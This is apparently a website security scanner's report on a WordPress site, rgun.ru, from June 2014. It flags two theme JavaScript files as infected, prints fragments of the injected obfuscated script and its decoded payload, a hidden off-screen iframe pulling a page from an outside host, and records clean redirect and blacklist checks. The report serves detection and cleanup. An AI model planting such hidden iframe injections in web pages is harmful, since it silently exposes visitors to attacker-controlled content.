Scanned pages/files
| Request | Server response | Status |
http://rgun.ru/ | 200 OK Content-Length: 51078 Content-Type: text/html | clean |
http://rgun.ru/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/x-javascript | clean |
http://rgun.ru/wp-content/themes/NewsCommunity/lib/shortcodes/js/bootstrap.js?ver=3.4.2 | 200 OK Content-Length: 12785 Content-Type: application/x-javascript | clean |
http://rgun.ru/wp-content/themes/NewsCommunity/lib/js/superfish.js?ver=3.4.2 | 200 OK Content-Length: 5555 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre o.onHide.call($ul); return this; }, showSuperfishUl : function(){ var o = sf.op, sh = sf.c.shadowClass+'-off', $ul = this.addClass(o.hoverClass) .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); Decoded script: <iframe src="http://Internet.sololineas.com/dfgatrsjygfhsrtjs12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://rgun.ru/wp-content/themes/NewsCommunity/lib/js/jquery.mobilemenu.js?ver=3.4.2 | 200 OK Content-Length: 3781 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var bebmain = 0; if ((bebmain = haystack.indexOf(needle, f_offset)) !== -1) { return bebmain; } return false; } function see_user_agent(){ var replace_user_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','Fre optText = dash + optText; } $('<option />', { "value" : this.href, "html" : optText, "selected" : (this.href == window.location.href) }).appendTo( '.' + settings.className ); }); $('.' + settings.className).change(function(){ var locations = $(this).val(); if( locations !== '#' ) { window.location.href = $(this).val(); }; }); }); return this; }; })(jQuery); Decoded script: <iframe src="http://Internet.sololineas.com/dfgatrsjygfhsrtjs12.html" style="position:absolute;left:-1155px;top:-1155px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://rgun.ru/wp-content/themes/NewsCommunity/includes/featuredposts/scripts/jquery.cycle.all.min.js | 200 OK Content-Length: 31032 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19916 Content-Type: text/javascript | clean |
http://rgun.ru/wp-includes/js/hoverIntent.js?ver=r6 | 200 OK Content-Length: 996 Content-Type: application/x-javascript | clean |
http://rgun.ru/feed/ | 200 OK Content-Length: 13871 Content-Type: text/xml | clean |
http://rgun.ru/test404page.js | 404 Not Found Content-Length: 22330 Content-Type: text/html | clean |
http://rgun.ru/top/avtomobili/ | 200 OK Content-Length: 28730 Content-Type: text/html | clean |
http://rgun.ru/top/kompyutery-i-elektronika/ | 200 OK Content-Length: 34633 Content-Type: text/html | clean |
http://rgun.ru/top/muzhskie-razgovory/ | 200 OK Content-Length: 44325 Content-Type: text/html | clean |
http://rgun.ru/top/muzhskoj-stil-i-moda/ | 200 OK Content-Length: 26599 Content-Type: text/html | clean |
http://rgun.ru/top/novosti/ | 200 OK Content-Length: 42543 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rgun.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Jun 2014 05:49:15 GMT
Server: nginx/1.4.3
Content-Type: text/html; charset=UTF-8
X-Pingback: http://rgun.ru/xmlrpc.php
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: rgun.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Jun 2014 05:49:15 GMT
Server: nginx/1.4.3
Content-Type: text/html; charset=UTF-8
X-Pingback: http://rgun.ru/xmlrpc.php
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: rgun.ru
Referer: http://www.google.com/search?q=rgun.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rgun.ru
Referer: http://www.google.com/search?q=rgun.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rgun.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://rgun.ru/
Result: rgun.ru is not infected or malware details are not published yet.
Result: rgun.ru is not infected or malware details are not published yet.